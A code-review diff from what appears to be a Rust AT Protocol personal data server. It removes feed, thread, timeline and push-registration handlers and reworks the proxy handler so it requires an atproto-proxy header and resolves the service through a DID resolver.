if let Some(ct) = resp_headers.get("content-type") {
109
-
response_builder = response_builder.header("content-type", ct);
110
-
}
111
-
match response_builder.body(axum::body::Body::from(body)) {
112
-
Ok(r) => r,
113
-
Err(e) => {
114
-
error!(error = ?e, "Error building getFeed response");
115
-
ApiError::UpstreamFailure.into_response()
116
-
}
117
-
}
118
-
}
119
-
Err(e) => {
120
-
error!(error = ?e, "Error proxying getFeed");
121
-
if e.is_timeout() {
122
-
ApiError::UpstreamTimeout.into_response()
123
-
} else if e.is_connect() {
124
-
ApiError::UpstreamUnavailable("Failed to connect to upstream".to_string())
125
-
.into_response()
126
-
} else {
127
-
ApiError::UpstreamFailure.into_response()
128
-
}
129
-
}
130
-
}
131
-
}
···
-11
src/api/feed/mod.rs
-11
src/api/feed/mod.rs
···
1
-
mod actor_likes;
2
-
mod author_feed;
3
-
mod custom_feed;
4
-
mod post_thread;
5
-
mod timeline;
6
-
7
-
pub use actor_likes::get_actor_likes;
8
-
pub use author_feed::get_author_feed;
9
-
pub use custom_feed::get_feed;
10
-
pub use post_thread::get_post_thread;
11
-
pub use timeline::get_timeline;
···
-315
src/api/feed/post_thread.rs
-315
src/api/feed/post_thread.rs
···
1
-
use crate::api::read_after_write::{
2
-
PostRecord, PostView, RecordDescript, extract_repo_rev, format_local_post,
3
-
format_munged_response, get_local_lag, get_records_since_rev, proxy_to_appview_via_registry,
4
-
};
5
-
use crate::state::AppState;
6
-
use axum::{
7
-
Json,
8
-
extract::{Query, State},
9
-
http::StatusCode,
10
-
response::{IntoResponse, Response},
11
-
};
12
-
use serde::{Deserialize, Serialize};
13
-
use serde_json::{Value, json};
14
-
use std::collections::HashMap;
15
-
use tracing::warn;
16
-
17
-
#[derive(Deserialize)]
18
-
pub struct GetPostThreadParams {
19
-
pub uri: String,
20
-
pub depth: Option<u32>,
21
-
#[serde(rename = "parentHeight")]
22
-
pub parent_height: Option<u32>,
23
-
}
24
-
25
-
#[derive(Debug, Clone, Serialize, Deserialize)]
26
-
#[serde(rename_all = "camelCase")]
27
-
pub struct ThreadViewPost {
28
-
#[serde(rename = "$type")]
29
-
pub thread_type: Option<String>,
30
-
pub post: PostView,
31
-
#[serde(skip_serializing_if = "Option::is_none")]
32
-
pub parent: Option<Box<ThreadNode>>,
33
-
#[serde(skip_serializing_if = "Option::is_none")]
34
-
pub replies: Option<Vec<ThreadNode>>,
35
-
#[serde(flatten)]
36
-
pub extra: HashMap<String, Value>,
37
-
}
38
-
39
-
#[derive(Debug, Clone, Serialize, Deserialize)]
40
-
#[serde(untagged)]
41
-
pub enum ThreadNode {
42
-
Post(Box<ThreadViewPost>),
43
-
NotFound(ThreadNotFound),
44
-
Blocked(ThreadBlocked),
45
-
}
46
-
47
-
#[derive(Debug, Clone, Serialize, Deserialize)]
48
-
#[serde(rename_all = "camelCase")]
49
-
pub struct ThreadNotFound {
50
-
#[serde(rename = "$type")]
51
-
pub thread_type: String,
52
-
pub uri: String,
53
-
pub not_found: bool,
54
-
}
55
-
56
-
#[derive(Debug, Clone, Serialize, Deserialize)]
57
-
#[serde(rename_all = "camelCase")]
58
-
pub struct ThreadBlocked {
59
-
#[serde(rename = "$type")]
60
-
pub thread_type: String,
61
-
pub uri: String,
62
-
pub blocked: bool,
63
-
pub author: Value,
64
-
}
65
-
66
-
#[derive(Debug, Clone, Serialize, Deserialize)]
67
-
pub struct PostThreadOutput {
68
-
pub thread: ThreadNode,
69
-
#[serde(skip_serializing_if = "Option::is_none")]
70
-
pub threadgate: Option<Value>,
71
-
}
72
-
73
-
const MAX_THREAD_DEPTH: usize = 10;
74
-
75
-
fn add_replies_to_thread(
76
-
thread: &mut ThreadViewPost,
77
-
local_posts: &[RecordDescript<PostRecord>],
78
-
author_did: &str,
79
-
author_handle: &str,
80
-
depth: usize,
81
-
) {
82
-
if depth >= MAX_THREAD_DEPTH {
83
-
return;
84
-
}
85
-
let thread_uri = &thread.post.uri;
86
-
let replies: Vec<_> = local_posts
87
-
.iter()
88
-
.filter(|p| {
89
-
p.record
90
-
.reply
91
-
.as_ref()
92
-
.and_then(|r| r.get("parent"))
93
-
.and_then(|parent| parent.get("uri"))
94
-
.and_then(|u| u.as_str())
95
-
== Some(thread_uri)
96
-
})
97
-
.map(|p| {
98
-
let post_view = format_local_post(p, author_did, author_handle, None);
99
-
ThreadNode::Post(Box::new(ThreadViewPost {
100
-
thread_type: Some("app.bsky.feed.defs#threadViewPost".to_string()),
101
-
post: post_view,
102
-
parent: None,
103
-
replies: None,
104
-
extra: HashMap::new(),
105
-
}))
106
-
})
107
-
.collect();
108
-
if !replies.is_empty() {
109
-
match &mut thread.replies {
110
-
Some(existing) => existing.extend(replies),
111
-
None => thread.replies = Some(replies),
112
-
}
113
-
}
114
-
if let Some(ref mut existing_replies) = thread.replies {
115
-
for reply in existing_replies.iter_mut() {
116
-
if let ThreadNode::Post(reply_thread) = reply {
117
-
add_replies_to_thread(
118
-
reply_thread,
119
-
local_posts,
120
-
author_did,
121
-
author_handle,
122
-
depth + 1,
123
-
);
124
-
}
125
-
}
126
-
}
127
-
}
128
-
129
-
pub async fn get_post_thread(
130
-
State(state): State<AppState>,
131
-
headers: axum::http::HeaderMap,
132
-
Query(params): Query<GetPostThreadParams>,
133
-
) -> Response {
134
-
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
135
-
let auth_user = if let Some(h) = auth_header {
136
-
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
137
-
crate::auth::validate_bearer_token(&state.db, &token)
138
-
.await
139
-
.ok()
140
-
} else {
141
-
None
142
-
}
143
-
} else {
144
-
None
145
-
};
146
-
let auth_did = auth_user.as_ref().map(|u| u.did.clone());
147
-
let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
148
-
let mut query_params = HashMap::new();
149
-
query_params.insert("uri".to_string(), params.uri.clone());
150
-
if let Some(depth) = params.depth {
151
-
query_params.insert("depth".to_string(), depth.to_string());
152
-
}
153
-
if let Some(parent_height) = params.parent_height {
154
-
query_params.insert("parentHeight".to_string(), parent_height.to_string());
155
-
}
156
-
let proxy_result = match proxy_to_appview_via_registry(
157
-
&state,
158
-
"app.bsky.feed.getPostThread",
159
-
&query_params,
160
-
auth_did.as_deref().unwrap_or(""),
161
-
auth_key_bytes.as_deref(),
162
-
)
163
-
.await
164
-
{
165
-
Ok(r) => r,
166
-
Err(e) => return e,
167
-
};
168
-
if proxy_result.status == StatusCode::NOT_FOUND {
169
-
return handle_not_found(&state, ¶ms.uri, auth_did, &proxy_result.headers).await;
170
-
}
171
-
if !proxy_result.status.is_success() {
172
-
return proxy_result.into_response();
173
-
}
174
-
let rev = match extract_repo_rev(&proxy_result.headers) {
175
-
Some(r) => r,
176
-
None => return proxy_result.into_response(),
177
-
};
178
-
let mut thread_output: PostThreadOutput = match serde_json::from_slice(&proxy_result.body) {
179
-
Ok(t) => t,
180
-
Err(e) => {
181
-
warn!("Failed to parse post thread response: {:?}", e);
182
-
return proxy_result.into_response();
183
-
}
184
-
};
185
-
let requester_did = match auth_did {
186
-
Some(d) => d,
187
-
None => return (StatusCode::OK, Json(thread_output)).into_response(),
188
-
};
189
-
let local_records = match get_records_since_rev(&state, &requester_did, &rev).await {
190
-
Ok(r) => r,
191
-
Err(e) => {
192
-
warn!("Failed to get local records: {}", e);
193
-
return proxy_result.into_response();
194
-
}
195
-
};
196
-
if local_records.posts.is_empty() {
197
-
return (StatusCode::OK, Json(thread_output)).into_response();
198
-
}
199
-
let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", requester_did)
200
-
.fetch_optional(&state.db)
201
-
.await
202
-
{
203
-
Ok(Some(h)) => h,
204
-
Ok(None) => requester_did.clone(),
205
-
Err(e) => {
206
-
warn!("Database error fetching handle: {:?}", e);
207
-
requester_did.clone()
208
-
}
209
-
};
210
-
if let ThreadNode::Post(ref mut thread_post) = thread_output.thread {
211
-
add_replies_to_thread(
212
-
thread_post,
213
-
&local_records.posts,
214
-
&requester_did,
215
-
&handle,
216
-
0,
217
-
);
218
-
}
219
-
let lag = get_local_lag(&local_records);
220
-
format_munged_response(thread_output, lag)
221
-
}
222
-
223
-
async fn handle_not_found(
224
-
state: &AppState,
225
-
uri: &str,
226
-
auth_did: Option<String>,
227
-
headers: &axum::http::HeaderMap,
228
-
) -> Response {
229
-
let rev = match extract_repo_rev(headers) {
230
-
Some(r) => r,
231
-
None => {
232
-
return (
233
-
StatusCode::NOT_FOUND,
234
-
Json(json!({"error": "NotFound", "message": "Post not found"})),
235
-
)
236
-
.into_response();
237
-
}
238
-
};
239
-
let requester_did = match auth_did {
240
-
Some(d) => d,
241
-
None => {
242
-
return (
243
-
StatusCode::NOT_FOUND,
244
-
Json(json!({"error": "NotFound", "message": "Post not found"})),
245
-
)
246
-
.into_response();
247
-
}
248
-
};
249
-
let uri_parts: Vec<&str> = uri.trim_start_matches("at://").split('/').collect();
250
-
if uri_parts.len() != 3 {
251
-
return (
252
-
StatusCode::NOT_FOUND,
253
-
Json(json!({"error": "NotFound", "message": "Post not found"})),
254
-
)
255
-
.into_response();
256
-
}
257
-
let post_did = uri_parts[0];
258
-
if post_did != requester_did {
259
-
return (
260
-
StatusCode::NOT_FOUND,
261
-
Json(json!({"error": "NotFound", "message": "Post not found"})),
262
-
)
263
-
.into_response();
264
-
}
265
-
let local_records = match get_records_since_rev(state, &requester_did, &rev).await {
266
-
Ok(r) => r,
267
-
Err(_) => {
268
-
return (
269
-
StatusCode::NOT_FOUND,
270
-
Json(json!({"error": "NotFound", "message": "Post not found"})),
271
-
)
272
-
.into_response();
273
-
}
274
-
};
275
-
let local_post = local_records.posts.iter().find(|p| p.uri == uri);
276
-
let local_post = match local_post {
277
-
Some(p) => p,
278
-
None => {
279
-
return (
280
-
StatusCode::NOT_FOUND,
281
-
Json(json!({"error": "NotFound", "message": "Post not found"})),
282
-
)
283
-
.into_response();
284
-
}
285
-
};
286
-
let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", requester_did)
287
-
.fetch_optional(&state.db)
288
-
.await
289
-
{
290
-
Ok(Some(h)) => h,
291
-
Ok(None) => requester_did.clone(),
292
-
Err(e) => {
293
-
warn!("Database error fetching handle: {:?}", e);
294
-
requester_did.clone()
295
-
}
296
-
};
297
-
let post_view = format_local_post(
298
-
local_post,
299
-
&requester_did,
300
-
&handle,
301
-
local_records.profile.as_ref(),
302
-
);
303
-
let thread = PostThreadOutput {
304
-
thread: ThreadNode::Post(Box::new(ThreadViewPost {
305
-
thread_type: Some("app.bsky.feed.defs#threadViewPost".to_string()),
306
-
post: post_view,
307
-
parent: None,
308
-
replies: None,
309
-
extra: HashMap::new(),
310
-
})),
311
-
threadgate: None,
312
-
};
313
-
let lag = get_local_lag(&local_records);
314
-
format_munged_response(thread, lag)
315
-
}
···
-275
src/api/feed/timeline.rs
-275
src/api/feed/timeline.rs
···
1
-
use crate::api::read_after_write::{
2
-
FeedOutput, FeedViewPost, PostView, extract_repo_rev, format_local_post,
3
-
format_munged_response, get_local_lag, get_records_since_rev, insert_posts_into_feed,
4
-
proxy_to_appview_via_registry,
5
-
};
6
-
use crate::state::AppState;
7
-
use axum::{
8
-
Json,
9
-
extract::{Query, State},
10
-
http::StatusCode,
11
-
response::{IntoResponse, Response},
12
-
};
13
-
use jacquard_repo::storage::BlockStore;
14
-
use serde::Deserialize;
15
-
use serde_json::{Value, json};
16
-
use std::collections::HashMap;
17
-
use tracing::warn;
18
-
19
-
#[derive(Deserialize)]
20
-
pub struct GetTimelineParams {
21
-
pub algorithm: Option<String>,
22
-
pub limit: Option<u32>,
23
-
pub cursor: Option<String>,
24
-
}
25
-
26
-
pub async fn get_timeline(
27
-
State(state): State<AppState>,
28
-
headers: axum::http::HeaderMap,
29
-
Query(params): Query<GetTimelineParams>,
30
-
) -> Response {
31
-
let token = match crate::auth::extract_bearer_token_from_header(
32
-
headers.get("Authorization").and_then(|h| h.to_str().ok()),
33
-
) {
34
-
Some(t) => t,
35
-
None => {
36
-
return (
37
-
StatusCode::UNAUTHORIZED,
38
-
Json(json!({"error": "AuthenticationRequired"})),
39
-
)
40
-
.into_response();
41
-
}
42
-
};
43
-
let auth_user = match crate::auth::validate_bearer_token(&state.db, &token).await {
44
-
Ok(user) => user,
45
-
Err(_) => {
46
-
return (
47
-
StatusCode::UNAUTHORIZED,
48
-
Json(json!({"error": "AuthenticationFailed"})),
49
-
)
50
-
.into_response();
51
-
}
52
-
};
53
-
if state.appview_registry.get_appview_for_method("app.bsky.feed.getTimeline").await.is_some() {
54
-
return get_timeline_with_appview(
55
-
&state,
56
-
¶ms,
57
-
&auth_user.did,
58
-
auth_user.key_bytes.as_deref(),
59
-
)
60
-
.await;
61
-
}
62
-
get_timeline_local_only(&state, &auth_user.did).await
63
-
}
64
-
65
-
async fn get_timeline_with_appview(
66
-
state: &AppState,
67
-
params: &GetTimelineParams,
68
-
auth_did: &str,
69
-
auth_key_bytes: Option<&[u8]>,
70
-
) -> Response {
71
-
let mut query_params = HashMap::new();
72
-
if let Some(algo) = ¶ms.algorithm {
73
-
query_params.insert("algorithm".to_string(), algo.clone());
74
-
}
75
-
if let Some(limit) = params.limit {
76
-
query_params.insert("limit".to_string(), limit.to_string());
77
-
}
78
-
if let Some(cursor) = ¶ms.cursor {
79
-
query_params.insert("cursor".to_string(), cursor.clone());
80
-
}
81
-
let proxy_result = match proxy_to_appview_via_registry(
82
-
state,
83
-
"app.bsky.feed.getTimeline",
84
-
&query_params,
85
-
auth_did,
86
-
auth_key_bytes,
87
-
)
88
-
.await
89
-
{
90
-
Ok(r) => r,
91
-
Err(e) => return e,
92
-
};
93
-
if !proxy_result.status.is_success() {
94
-
return proxy_result.into_response();
95
-
}
96
-
let rev = extract_repo_rev(&proxy_result.headers);
97
-
if rev.is_none() {
98
-
return proxy_result.into_response();
99
-
}
100
-
let rev = rev.unwrap();
101
-
let mut feed_output: FeedOutput = match serde_json::from_slice(&proxy_result.body) {
102
-
Ok(f) => f,
103
-
Err(e) => {
104
-
warn!("Failed to parse timeline response: {:?}", e);
105
-
return proxy_result.into_response();
106
-
}
107
-
};
108
-
let local_records = match get_records_since_rev(state, auth_did, &rev).await {
109
-
Ok(r) => r,
110
-
Err(e) => {
111
-
warn!("Failed to get local records: {}", e);
112
-
return proxy_result.into_response();
113
-
}
114
-
};
115
-
if local_records.count == 0 {
116
-
return proxy_result.into_response();
117
-
}
118
-
let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", auth_did)
119
-
.fetch_optional(&state.db)
120
-
.await
121
-
{
122
-
Ok(Some(h)) => h,
123
-
Ok(None) => auth_did.to_string(),
124
-
Err(e) => {
125
-
warn!("Database error fetching handle: {:?}", e);
126
-
auth_did.to_string()
127
-
}
128
-
};
129
-
let local_posts: Vec<_> = local_records
130
-
.posts
131
-
.iter()
132
-
.map(|p| format_local_post(p, auth_did, &handle, local_records.profile.as_ref()))
133
-
.collect();
134
-
insert_posts_into_feed(&mut feed_output.feed, local_posts);
135
-
let lag = get_local_lag(&local_records);
136
-
format_munged_response(feed_output, lag)
137
-
}
138
-
139
-
async fn get_timeline_local_only(state: &AppState, auth_did: &str) -> Response {
140
-
let user_id: uuid::Uuid =
141
-
match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", auth_did)
142
-
.fetch_optional(&state.db)
143
-
.await
144
-
{
145
-
Ok(Some(id)) => id,
146
-
Ok(None) => {
147
-
return (
148
-
StatusCode::INTERNAL_SERVER_ERROR,
149
-
Json(json!({"error": "InternalError", "message": "User not found"})),
150
-
)
151
-
.into_response();
152
-
}
153
-
Err(e) => {
154
-
warn!("Database error fetching user: {:?}", e);
155
-
return (
156
-
StatusCode::INTERNAL_SERVER_ERROR,
157
-
Json(json!({"error": "InternalError", "message": "Database error"})),
158
-
)
159
-
.into_response();
160
-
}
161
-
};
162
-
let follows_query = sqlx::query!(
163
-
"SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.graph.follow' LIMIT 5000",
164
-
user_id
165
-
)
166
-
.fetch_all(&state.db)
167
-
.await;
168
-
let follow_cids: Vec<String> = match follows_query {
169
-
Ok(rows) => rows.iter().map(|r| r.record_cid.clone()).collect(),
170
-
Err(_) => {
171
-
return (
172
-
StatusCode::INTERNAL_SERVER_ERROR,
173
-
Json(json!({"error": "InternalError"})),
174
-
)
175
-
.into_response();
176
-
}
177
-
};
178
-
let mut followed_dids: Vec<String> = Vec::new();
179
-
for cid_str in follow_cids {
180
-
let cid = match cid_str.parse::<cid::Cid>() {
181
-
Ok(c) => c,
182
-
Err(_) => continue,
183
-
};
184
-
let block_bytes = match state.block_store.get(&cid).await {
185
-
Ok(Some(b)) => b,
186
-
_ => continue,
187
-
};
188
-
let record: Value = match serde_ipld_dagcbor::from_slice(&block_bytes) {
189
-
Ok(v) => v,
190
-
Err(_) => continue,
191
-
};
192
-
if let Some(subject) = record.get("subject").and_then(|s| s.as_str()) {
193
-
followed_dids.push(subject.to_string());
194
-
}
195
-
}
196
-
if followed_dids.is_empty() {
197
-
return (
198
-
StatusCode::OK,
199
-
Json(FeedOutput {
200
-
feed: vec![],
201
-
cursor: None,
202
-
}),
203
-
)
204
-
.into_response();
205
-
}
206
-
let posts_result = sqlx::query!(
207
-
"SELECT r.record_cid, r.rkey, r.created_at, u.did, u.handle
208
-
FROM records r
209
-
JOIN repos rp ON r.repo_id = rp.user_id
210
-
JOIN users u ON rp.user_id = u.id
211
-
WHERE u.did = ANY($1) AND r.collection = 'app.bsky.feed.post'
212
-
ORDER BY r.created_at DESC
213
-
LIMIT 50",
214
-
&followed_dids
215
-
)
216
-
.fetch_all(&state.db)
217
-
.await;
218
-
let posts = match posts_result {
219
-
Ok(rows) => rows,
220
-
Err(_) => {
221
-
return (
222
-
StatusCode::INTERNAL_SERVER_ERROR,
223
-
Json(json!({"error": "InternalError"})),
224
-
)
225
-
.into_response();
226
-
}
227
-
};
228
-
let mut feed: Vec<FeedViewPost> = Vec::new();
229
-
for row in posts {
230
-
let record_cid: String = row.record_cid;
231
-
let rkey: String = row.rkey;
232
-
let created_at: chrono::DateTime<chrono::Utc> = row.created_at;
233
-
let author_did: String = row.did;
234
-
let author_handle: String = row.handle;
235
-
let cid = match record_cid.parse::<cid::Cid>() {
236
-
Ok(c) => c,
237
-
Err(_) => continue,
238
-
};
239
-
let block_bytes = match state.block_store.get(&cid).await {
240
-
Ok(Some(b)) => b,
241
-
_ => continue,
242
-
};
243
-
let record: Value = match serde_ipld_dagcbor::from_slice(&block_bytes) {
244
-
Ok(v) => v,
245
-
Err(_) => continue,
246
-
};
247
-
let uri = format!("at://{}/app.bsky.feed.post/{}", author_did, rkey);
248
-
feed.push(FeedViewPost {
249
-
post: PostView {
250
-
uri,
251
-
cid: record_cid,
252
-
author: crate::api::read_after_write::AuthorView {
253
-
did: author_did,
254
-
handle: author_handle,
255
-
display_name: None,
256
-
avatar: None,
257
-
extra: HashMap::new(),
258
-
},
259
-
record,
260
-
indexed_at: created_at.to_rfc3339(),
261
-
embed: None,
262
-
reply_count: 0,
263
-
repost_count: 0,
264
-
like_count: 0,
265
-
quote_count: 0,
266
-
extra: HashMap::new(),
267
-
},
268
-
reply: None,
269
-
reason: None,
270
-
feed_context: None,
271
-
extra: HashMap::new(),
272
-
});
273
-
}
274
-
(StatusCode::OK, Json(FeedOutput { feed, cursor: None })).into_response()
275
-
}
···
-3
src/api/mod.rs
-3
src/api/mod.rs
-3
src/api/notification/mod.rs
-3
src/api/notification/mod.rs
-153
src/api/notification/register_push.rs
-153
src/api/notification/register_push.rs
···
1
-
use crate::api::ApiError;
2
-
use crate::api::proxy_client::{is_ssrf_safe, proxy_client, validate_did};
3
-
use crate::state::AppState;
4
-
use axum::{
5
-
Json,
6
-
extract::State,
7
-
http::{HeaderMap, StatusCode},
8
-
response::{IntoResponse, Response},
9
-
};
10
-
use serde::Deserialize;
11
-
use serde_json::json;
12
-
use tracing::{error, info};
13
-
14
-
#[derive(Deserialize)]
15
-
#[serde(rename_all = "camelCase")]
16
-
pub struct RegisterPushInput {
17
-
pub service_did: String,
18
-
pub token: String,
19
-
pub platform: String,
20
-
pub app_id: String,
21
-
}
22
-
23
-
const VALID_PLATFORMS: &[&str] = &["ios", "android", "web"];
24
-
25
-
pub async fn register_push(
26
-
State(state): State<AppState>,
27
-
headers: HeaderMap,
28
-
Json(input): Json<RegisterPushInput>,
29
-
) -> Response {
30
-
let token = match crate::auth::extract_bearer_token_from_header(
31
-
headers.get("Authorization").and_then(|h| h.to_str().ok()),
32
-
) {
33
-
Some(t) => t,
34
-
None => return ApiError::AuthenticationRequired.into_response(),
35
-
};
36
-
let auth_user = match crate::auth::validate_bearer_token(&state.db, &token).await {
37
-
Ok(user) => user,
38
-
Err(e) => return ApiError::from(e).into_response(),
39
-
};
40
-
if let Err(e) = validate_did(&input.service_did) {
41
-
return ApiError::InvalidRequest(format!("Invalid serviceDid: {}", e)).into_response();
42
-
}
43
-
if input.token.is_empty() || input.token.len() > 4096 {
44
-
return ApiError::InvalidRequest("Invalid push token".to_string()).into_response();
45
-
}
46
-
if !VALID_PLATFORMS.contains(&input.platform.as_str()) {
47
-
return ApiError::InvalidRequest(format!(
48
-
"Invalid platform. Must be one of: {}",
49
-
VALID_PLATFORMS.join(", ")
50
-
))
51
-
.into_response();
52
-
}
53
-
if input.app_id.is_empty() || input.app_id.len() > 256 {
54
-
return ApiError::InvalidRequest("Invalid appId".to_string()).into_response();
55
-
}
56
-
let resolved = match state.appview_registry.get_appview_for_method("app.bsky.notification.registerPush").await {
57
-
Some(r) => r,
58
-
None => {
59
-
return ApiError::UpstreamUnavailable("No upstream AppView configured for app.bsky.notification.registerPush".to_string())
60
-
.into_response();
61
-
}
62
-
};
63
-
if let Err(e) = is_ssrf_safe(&resolved.url) {
64
-
error!("SSRF check failed for appview URL: {}", e);
65
-
return ApiError::UpstreamUnavailable(format!("Invalid upstream URL: {}", e))
66
-
.into_response();
67
-
}
68
-
let key_row = match sqlx::query!(
69
-
"SELECT key_bytes, encryption_version FROM user_keys k JOIN users u ON k.user_id = u.id WHERE u.did = $1",
70
-
auth_user.did
71
-
)
72
-
.fetch_optional(&state.db)
73
-
.await
74
-
{
75
-
Ok(Some(row)) => row,
76
-
Ok(None) => {
77
-
error!(did = %auth_user.did, "No signing key found for user");
78
-
return ApiError::InternalError.into_response();
79
-
}
80
-
Err(e) => {
81
-
error!(error = ?e, "Database error fetching signing key");
82
-
return ApiError::DatabaseError.into_response();
83
-
}
84
-
};
85
-
let decrypted_key =
86
-
match crate::config::decrypt_key(&key_row.key_bytes, key_row.encryption_version) {
87
-
Ok(k) => k,
88
-
Err(e) => {
89
-
error!(error = ?e, "Failed to decrypt signing key");
90
-
return ApiError::InternalError.into_response();
91
-
}
92
-
};
93
-
let service_token = match crate::auth::create_service_token(
94
-
&auth_user.did,
95
-
&input.service_did,
96
-
"app.bsky.notification.registerPush",
97
-
&decrypted_key,
98
-
) {
99
-
Ok(t) => t,
100
-
Err(e) => {
101
-
error!(error = ?e, "Failed to create service token");
102
-
return ApiError::InternalError.into_response();
103
-
}
104
-
};
105
-
let target_url = format!("{}/xrpc/app.bsky.notification.registerPush", resolved.url);
106
-
info!(
107
-
target = %target_url,
108
-
service_did = %input.service_did,
109
-
platform = %input.platform,
110
-
"Proxying registerPush request"
111
-
);
112
-
let client = proxy_client();
113
-
let request_body = json!({
114
-
"serviceDid": input.service_did,
115
-
"token": input.token,
116
-
"platform": input.platform,
117
-
"appId": input.app_id
118
-
});
119
-
match client
120
-
.post(&target_url)
121
-
.header("Authorization", format!("Bearer {}", service_token))
122
-
.header("Content-Type", "application/json")
123
-
.json(&request_body)
124
-
.send()
125
-
.await
126
-
{
127
-
Ok(resp) => {
128
-
let status =
129
-
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
130
-
if status.is_success() {
131
-
StatusCode::OK.into_response()
132
-
} else {
133
-
let body = resp.bytes().await.unwrap_or_default();
134
-
error!(
135
-
status = %status,
136
-
"registerPush upstream error"
137
-
);
138
-
ApiError::from_upstream_response(status.as_u16(), &body).into_response()
139
-
}
140
-
}
141
-
Err(e) => {
142
-
error!(error = ?e, "Error proxying registerPush");
143
-
if e.is_timeout() {
144
-
ApiError::UpstreamTimeout.into_response()
145
-
} else if e.is_connect() {
146
-
ApiError::UpstreamUnavailable("Failed to connect to upstream".to_string())
147
-
.into_response()
148
-
} else {
149
-
ApiError::UpstreamFailure.into_response()
150
-
}
151
-
}
152
-
}
153
-
}
···
+58
-40
src/api/proxy.rs
+58
-40
src/api/proxy.rs
···
1
use crate::api::proxy_client::proxy_client;
2
use crate::state::AppState;
3
use axum::{
4
body::Bytes,
5
extract::{Path, RawQuery, State},
6
http::{HeaderMap, Method, StatusCode},
7
response::{IntoResponse, Response},
8
};
9
use tracing::{error, info, warn};
10
11
pub async fn proxy_handler(
···
16
RawQuery(query): RawQuery,
17
body: Bytes,
18
) -> Response {
19
-
let proxy_header = headers
20
.get("atproto-proxy")
21
.and_then(|h| h.to_str().ok())
22
-
.map(|s| s.to_string());
23
-
let (appview_url, service_aud) = match &proxy_header {
24
-
Some(did_str) => {
25
-
let did_without_fragment = did_str.split('#').next().unwrap_or(did_str).to_string();
26
-
match state.appview_registry.resolve_appview_did(&did_without_fragment).await {
27
-
Some(resolved) => (resolved.url, Some(resolved.did)),
28
-
None => {
29
-
error!(did = %did_str, "Could not resolve service DID");
30
-
return (StatusCode::BAD_GATEWAY, "Could not resolve service DID")
31
-
.into_response();
32
-
}
33
-
}
34
}
35
None => {
36
-
match state.appview_registry.get_appview_for_method(&method).await {
37
-
Some(resolved) => (resolved.url, Some(resolved.did)),
38
-
None => {
39
-
return (StatusCode::BAD_GATEWAY, "No upstream AppView configured for this method")
40
-
.into_response();
41
-
}
42
-
}
43
}
44
};
45
let target_url = match &query {
46
-
Some(q) => format!("{}/xrpc/{}?{}", appview_url, method, q),
47
-
None => format!("{}/xrpc/{}", appview_url, method),
48
};
49
info!("Proxying {} request to {}", method_verb, target_url);
50
let client = proxy_client();
51
let mut request_builder = client.request(method_verb, &target_url);
52
let mut auth_header_val = headers.get("Authorization").cloned();
53
-
if let Some(aud) = &service_aud {
54
-
if let Some(token) = crate::auth::extract_bearer_token_from_header(
55
-
headers.get("Authorization").and_then(|h| h.to_str().ok()),
56
-
) {
57
-
match crate::auth::validate_bearer_token(&state.db, &token).await {
58
-
Ok(auth_user) => {
59
-
if let Some(key_bytes) = auth_user.key_bytes {
60
-
match crate::auth::create_service_token(&auth_user.did, aud, &method, &key_bytes) {
61
-
Ok(new_token) => {
62
-
if let Ok(val) = axum::http::HeaderValue::from_str(&format!("Bearer {}", new_token)) {
63
-
auth_header_val = Some(val);
64
-
}
65
}
66
-
Err(e) => {
67
-
warn!("Failed to create service token: {:?}", e);
68
-
}
69
}
70
}
71
}
72
-
Err(e) => {
73
-
warn!("Token validation failed: {:?}", e);
74
-
}
75
}
76
}
77
}
78
if let Some(val) = auth_header_val {
79
request_builder = request_builder.header("Authorization", val);
80
}
···
86
if !body.is_empty() {
87
request_builder = request_builder.body(body);
88
}
89
match request_builder.send().await {
90
Ok(resp) => {
91
let status = resp.status();
···
1
use crate::api::proxy_client::proxy_client;
2
use crate::state::AppState;
3
use axum::{
4
+
Json,
5
body::Bytes,
6
extract::{Path, RawQuery, State},
7
http::{HeaderMap, Method, StatusCode},
8
response::{IntoResponse, Response},
9
};
10
+
use serde_json::json;
11
use tracing::{error, info, warn};
12
13
pub async fn proxy_handler(
···
18
RawQuery(query): RawQuery,
19
body: Bytes,
20
) -> Response {
21
+
let proxy_header = match headers
22
.get("atproto-proxy")
23
.and_then(|h| h.to_str().ok())
24
+
{
25
+
Some(h) => h.to_string(),
26
+
None => {
27
+
return (
28
+
StatusCode::BAD_REQUEST,
29
+
Json(json!({
30
+
"error": "InvalidRequest",
31
+
"message": "Missing required atproto-proxy header"
32
+
})),
33
+
)
34
+
.into_response();
35
}
36
+
};
37
+
38
+
let did = proxy_header.split('#').next().unwrap_or(&proxy_header);
39
+
let resolved = match state.did_resolver.resolve_did(did).await {
40
+
Some(r) => r,
41
None => {
42
+
error!(did = %did, "Could not resolve service DID");
43
+
return (
44
+
StatusCode::BAD_GATEWAY,
45
+
Json(json!({
46
+
"error": "UpstreamFailure",
47
+
"message": "Could not resolve service DID"
48
+
})),
49
+
)
50
+
.into_response();
51
}
52
};
53
+
54
let target_url = match &query {
55
+
Some(q) => format!("{}/xrpc/{}?{}", resolved.url, method, q),
56
+
None => format!("{}/xrpc/{}", resolved.url, method),
57
};
58
info!("Proxying {} request to {}", method_verb, target_url);
59
+
60
let client = proxy_client();
61
let mut request_builder = client.request(method_verb, &target_url);
62
+
63
let mut auth_header_val = headers.get("Authorization").cloned();
64
+
if let Some(token) = crate::auth::extract_bearer_token_from_header(
65
+
headers.get("Authorization").and_then(|h| h.to_str().ok()),
66
+
) {
67
+
match crate::auth::validate_bearer_token(&state.db, &token).await {
68
+
Ok(auth_user) => {
69
+
if let Some(key_bytes) = auth_user.key_bytes {
70
+
match crate::auth::create_service_token(
71
+
&auth_user.did,
72
+
&resolved.did,
73
+
&method,
74
+
&key_bytes,
75
+
) {
76
+
Ok(new_token) => {
77
+
if let Ok(val) =
78
+
axum::http::HeaderValue::from_str(&format!("Bearer {}", new_token))
79
+
{
80
+
auth_header_val = Some(val);
81
}
82
+
}
83
+
Err(e) => {
84
+
warn!("Failed to create service token: {:?}", e);
85
}
86
}
87
}
88
+
}
89
+
Err(e) => {
90
+
warn!("Token validation failed: {:?}", e);
91
}
92
}
93
}
94
+
